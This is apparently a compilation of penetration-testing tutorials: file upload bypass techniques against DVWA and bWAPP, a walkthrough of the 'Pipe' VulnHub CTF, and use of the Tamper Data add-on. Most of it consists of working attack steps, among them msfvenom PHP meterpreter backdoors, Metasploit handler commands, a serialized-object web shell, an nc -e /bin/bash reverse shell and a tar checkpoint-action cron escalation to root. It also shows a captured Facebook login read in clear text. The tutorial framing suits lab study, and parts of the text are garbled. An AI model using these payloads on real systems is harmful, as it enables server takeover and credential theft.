5 ways to File upload vulnerability Exploitation

File upload vulnerability is a major problem with web based applications. In many web servers this vulnerability depends entirely on purpose, that allows an attacker to upload a file with malicious code in it that can be executed on the server. An attacker might be able to put a phishing page into the website or deface the website.

Attacker may reveal internal information of web server to other and in some chances to sensitive data might be informal, by unauthorized people.

In this tutorial we are going to disscuss various types of file upload vulnerbility and then try to exploit them. You will learn the different injection techniques to upload a malicious file of php in a web server and exploit them.

Basic file upload Technique

In this scenario a simple php file will get uploaded on the web server without any restrictions, here server does not check the content- type or file extensions to be uploaded.

For example if server allows to upload a text file or image, which is considered as data and if security parameter is low where as no restrictions  on the content-type or filename then you can easily bypass malicious php file which is considered as application in the web server.

Let’s start!!!

Click on DVWA Security and set Website Security Level low

Open terminal in kali linux and create php backdoor through following command

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.104 lport=4444 -f raw

Copy and paste the highlighted code in leafpad and save as with PHP extension as img.php on the desktop.

Load metasploit framework type msfconsole and start multi handler.

Come back to your DVWA lab and click to file upload option from vulnerability menu.

Now click on browse tag to browse img.php file to upload it on web server and click on upload which will upload your file on web server.

After uploading the PHP file it will show the path of directory where your file is successfully uploaded now copy the selected part and paste it in URL to execute it.

hackable/uploads/img.php

msf > use multi/handler

msf exploit(handler) > set payload php/meterpreter/reverse_tcp

msf exploit(handler) > set lhost 192.168.1.104

msf exploit(handler) > set lport 4444

msf exploit(handler) > exploit

meterpreter > sysinfo

You can observe, I have got meterpreter session 1 of victim PC on the metasploit.

Double extension injection Technique

Click on DVWA Security and set Website Security Level medium

Here we come across a situation where it would check the file extension. In medium security it only allows .jpeg and .png extension file to be uploaded on the web server and restricts other files with single file extension while uploading in the web server. Now there are some techniques through which we will bypass the malicious PHP file in the web server.

 

It is an attempt to hide the real nature of a file by inserting multiple extensions with filename which creates confusion for security parameters. For example img1.php.png look like png image which is a data not an application but when the file is uploaded with double extension it will execute php file which is an application.

Let’s continue!!!

Repeat same process to create the php backdoor with msfvenom and now save the file as img1.php.png on desktop and run the multi handler at the background.

Since this file will get upload in medium security which is little different from low security as this will apparently check the extension of file as well as read the file name.

Click to file upload option from vulnerability menu. Again click on browse button to browse img1.php.png file to upload it. Now start burp suite and make intercept on under proxy tab.  Don’t forget to set manual proxy of your browser and click on upload.

 

Intercept tab will work to catch the sent request of the post method when you click to upload button.  Now change img1.php.png into img1.php inside the fetched data.

Compare the change before uploading your PHP file. After altering click on forward to upload PHP file in directory.

After uploading the PHP file it will show the path of directory where your file is successfully uploaded now copy the selected part and paste it in URL to execute it.

hackable/uploads/img1.php

This’ll provide a meterpreter session 2 when you run URL in browser.

 meterpreter > sysinfo

Content – Type file Upload

"Content-Type" entity in the header of the request indicates the internal media type of the message content. Sometimes web applications use this parameter in order to recognize a file as a valid one. For instance, they only accept the files with the "Content-Type" of "text/plain". It is possible to bypass this protection by changing this parameter in the request header using a web proxy.

Again repeat the same process to create the php backdoor with msfvenom and now save the file as img2.php on desktop and run the multi handler at the background

Start burp suite and repeat the process for fetching the sent request. In the screenshot you can read the content- type for php file; now change this content type application/x-php into image/png to upload your php file.

From below image you can perceive the manipulation in content type which known as content-type injection technique.

Now copy the selected part and past it in URL to execute it.

hackable/uploads/img2.php

This’ll provide a meterpreter session 3 when you run URL in browser.

 meterpreter > sysinfo

Null byte Injection

Null Byte Injection is an exploitation technique which uses URL-encoded null byte characters (i.e. , or 0x00 in hex) to the user-supplied data. A null byte in the URL is represented by '' which in ASCII is a "" (blank space).This injection process can alter the intended logic of the application and allow malicious adversary to get unauthorized access to the system files.

Now here you will see I have inserted a string at the end of extension and change that string into its  hex  value and then replace that hex value from null byte character ‘’. The reason behind inserting a null byte value is that, some application servers scripting language still use c/c++ libraries to check the filename and content. In c/c++  a line ends with /00 is called null byte.

Hence when the compiler studies a null byte at the end of the string, it will assume that it has arrived at the end of string and stop further reading of string.

Now create the php backdoor with msfvenom and now save the file as img3.php.jpg on desktop and run the multi handler at the background.

 

Start burp suite and repeat the process for fetching the sent request. It look same like double extension file but here the technique is quite different from double extension file uploading.

Add any string or alphabet as shown in the screenshot here and you will notice that in the highlighted text I have made change in img3.php.jpg into img3.phpD.jpg, now follow the next step will be to modify this string into null byte.

In next step we will decode the inserted string; now decode your string or alphabet as I had given ‘D’ now decodes it into hex which will tell its hex value and from screenshot you can read its hex value is 44.

Now click on hex option under intercept which will display the hex value of intercepted data. Here you can read the hex value for the file name which I have highlighted. In order to null exploitation replace the hex value 44 from null byte value 00.

Now you can perceive the changes from the given screenshot where I have injected the null value in the place of hex value of our inserted string.

When again you will view the raw data, now here you will find that the string ’D’ is changed into null byte value.

Now forward the intercepted data to exploit file upload through null byte injection technique. Great!!! We have bypass the medium security now copy the uploaded path and past it in URL to execute it.

When you will run the path it will give you reverse connection on metasploit and from the given screenshot you can see I have got meterpreter session 4 also. 

Blacklisting File Extensions

Next target is bwapp which is another web server Set security level medium, from list box choose your bug and select Unrestricted File Upload now and click on hack

Some sever side scripting language check .php extension at filename and allow only those file which does not contain .php extension. Here we can inject our file by changing a number of letters to their capital forms to bypass the case sensitive rule, for example PHp or PHP3.

Now create the php backdoor with msfvenom and now save the file as img4.php3 on desktop and run the multi handler at the background.

Then browse img4.php3 to upload in web server and click on upload tab. Here in medium security it will allow the php file to get upload on web server and from given screenshot you can see my php file is successfully uploaded.  Now click on the link here and you will get reverse connection at multi handler.

msf > use multi/handler

msf exploit(handler) > set payload php/meterpreter/reverse_tcp

msf exploit(handler) > set lhost 192.168.1.104

msf exploit(handler) > set lport 4444

msf exploit(handler) > exploit

meterpreter > sysinfo

Great!!!  You can see I have got meterpreter session 1.

Source: https://www.owasp.org/index.php/Unrestricted_File_Upload

Hack the Pipe VM (CTF Challenge)

Hello friends today we are going to solve another CTF challenge “PIPE” of the vulnhub labs design by Mr. Sagi. The level of this challenge is not so tough and its difficulty level is labelled as medium. Solving this lab will give you a good experience of penetration testing.

You can download it from here: https://www.vulnhub.com/entry/devrandom-pipe,124/

Penetrating Methodologies:

Network Scanning (Nmap,Netdiscover)

Abusing HTTP service (Burp Suite)

Let’s Begin!!

Start with netdiscover command to identify target IP in the local network, in my network 192.168.1.104 is my target IP, you will get yours.

netdiscover

Further let’s enumerate open ports and protocols information of the target’s network with help of nmap following command:

nmap -p- -A 192.168.1.104 --open

And from here we get open ports 22, 80, 111, 54073

Now we will open target IP in browser as port 80 is active. Here the website reflects off unauthorized message with a login page. On login window it written “the site says: index.php” which we will be using later on.

Now using burpsuite we are going to capture the cookies for login page by setting manual proxy of Firefox browser. It has intercepted data for login page. Here we will change HTTP-GET method into HTTP-POST.

As shown in the below image replace GET from POST/index.php and then forward the intercepted request.

Ok! To above step leads us to website which shows a PIPE picture and a link below it to get Show artist info.

As we cannot see anything else on this web page so we opened the page source code. It shows an accessible directory scriptz/php.js in its script content.

Now open target IP with /scriptz in browser, and you will notice some file or scripts are present here. Download both files for further enumeration.

So first we open php.js file here we found it is serializing some data and after that we open log.php.bak which works with the js file for serialization.

Then I search in Google and found Deserialization vulnerabilities in JS 

Now again returning to our original web page, and click on the link given below of the Pipe image and capture cookies that request in burp.

Select the parameter and send it for decoding in smart decoder, in the image below red highlighted text is decoded and result is shown in below window the code which is given in bottom window need to be altered so that we can upload our malicious code.

Now modify the parm with the following code for remote code execution and then forward the request.

O:3:"Log":2:{s:8:"filename";s:31:"/var/www/html/scriptz/shell.php";s:4:"data";s:60:" '; system($_GET['cmd']); echo '

'; ?>";}

Check your shell.php file is uploaded in that accessible directory.

Now we have uploaded shell it’s time to open it see what it gives us. As we have executed the code for cmd, we will type cmd in URL as well.

cmd=id

It will dump the id of current user i.e. www-data.

Now let’s try to spwan tty shell of the victim’s machine with help of netcat payload: nc 10.0.0.1 1234 -e /bin/bash 192.168.1.107 1234

Then start netcat listener and then execute the payload to spawn tty shell of victim’s machine.

nc -lvp 1234

As you can observe we have successfully compromised target machine and run the following command for gaining root access.

python -c 'import pty; pty.spawn("/bin/sh")'

Then we check for any cronjobs running on the system via cat command we can see a couple of cron jobs running which interest us. In /etc/crontab the script /usr/bin/compress.sh which is world readable now follow the below steps

cat /etc/crontab

cat /usr/bin/compress.sh

cd /home/rene/backup

ls

echo "chmod u+s /usr/bin/find" > test.sh

echo "" > "--checkpoint-action=exec=sh test.sh"

echo "" > --checkpoint=1

ls -al /usr/bin/find

touch raj

find raj -exec "/bin/sh" \;

Yuppie!! We got the root access.

At last open the flag.txt file and we have our flag.

Mission accomplished!

Web Penetration Testing with Tamper Data (Firefox Add-on)

One of the more popular hacker tools for Firefox is an add-on called Tamper Data. Tamper Data isn't a super complicated tool; it's merely a proxy, or go-between, that inserts it in-between the user and the web site or web application that they are browsing.

All those GETs and POSTs can be manipulated without the constraints imposed by the user interface seen in the browser.

It allows a person to tamper with the data being sent back and forth between the client and the server. When Tamper Data is started and a web app or website is launched in Firefox, Tamper Data will show all of the fields that allow user input or manipulation.

Hackers can then change a field to an "alternate value" and send the data to the server to see how it reacts.

Installing Tamper Data Add-On

Select the menu bar on the right end in Firefox. Click on Add-ons.

In the search bar field, search for Tamper Data add-on. Click on Install after installing the add-on, restart the Firefox Browser.

Displaying clear text password in Facebook using Tamper Data

Now I am trying to login into my Facebook account and when I typed my password I see the “password in dotted form" so I wanted to know whether the password typed is correct or not. Click on tools option from menu bar and select tamper data to capture the request

A pop will get open for tamper data click on start tamper which start capturing the ongoing request As we know that the username and password typed in the fields go through POST method. Now After that click on Login button to send the data through POST method.

When the request will send through browser to web server a pop up will appear, now hit Tamper, which will start capturing the sending request.

Now you can see from given image on the right half of Tamper Popup window it is showing the email and pass in clear text.

HTML Injection - Reflection POST method with Tamper Data

I have installed bWAPP on my wamp server running on localhost. It can be accessed through browser. Navigate to login page using url “localhost/bWAPP/login.php".

Login into web application server by typing bee: bug as login credential, now choose your bug” html injection-reflected (post)” from given list of bugs and click on hack.

In given text field enter first name: kunal and last name: bhal.

Before clicking Go; again start tamper data to change the field values. After that we can see the post values and now modify it to change the username of any person.

Now click on go and a dialog box get opened here click on tamper to capture the request.

Here you can read the captured request from given screenshot which has captured the first and last name kunal: bhal.

Tamper data allow you to modify the sent request of any user without his permission, so I am going to change first and last name given by user into first as first name and last as last name and then click on ok to forword the request.

Now you can see the request has been forward on the web server.

We successfully changed the username of the person; here you can see username to be "first last". Similarly you can use other modules with tamper data to exploit bWAPP.

File upload using tamper data

Now open the DVWA in your browser with your local IP as 192.168.1.102:81/DVWA and login with following credentials:

Username – admin

Password – password

Click on DVWA Security and set Website Security Level medium then select file upload vulnerability

Open terminal in kali linux and create php backdoor through following command

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.103 lport=4444 -f raw

Copy and paste the highlighted code in leafpad and save as with PHP extension as hacked.php.png on the desktop.

Load metasploit framework type msfconsole and start multi handler.

Now click to browse button to browse hacked.php.png file to upload.

Click on tools option from menu bar and select tamper data to capture the request.

Before clicking upload; again start tamper data and then click on upload; when the request will send through browser to web server a pop up will appear then, now hit Tamper, which will intercept the sending request.

From given screenshot you can see tamper data has capture the POST request now copy the selected data from POST DATA.

Paste POST DATA in a text file to change the extension of our upload. As you can read the name of file is hack.php.png but we want to upload a php file.

Now modify pasted POST DATA hacked.php.png into hacked.php then select and copy the complete data.

Now past the whole data of text file in the field given for POST DATA and click on ok

So here we have forward the modified request, now click on stop tamper.

From screenshot you can see our php is uploaded in uploads directory. Now copy the highlighted path /hackable/uploads/hacked.php where file is uploaded and run this path

http://192.168.1.102:81/DVWA/hackable/uploads/hacked.php in URL to execute it.

You will get victim reverse connection on metasploit.

msf > use multi/handler

msf exploit(handler) > set payload php/meterpreter/reverse_tcp

msf exploit(handler) > set lhost 192.168.1.103

msf exploit(handler) > set lport 4444

msf exploit(handler) > run

meterpreter > sysinfo

I have got meterpreter session of victim PC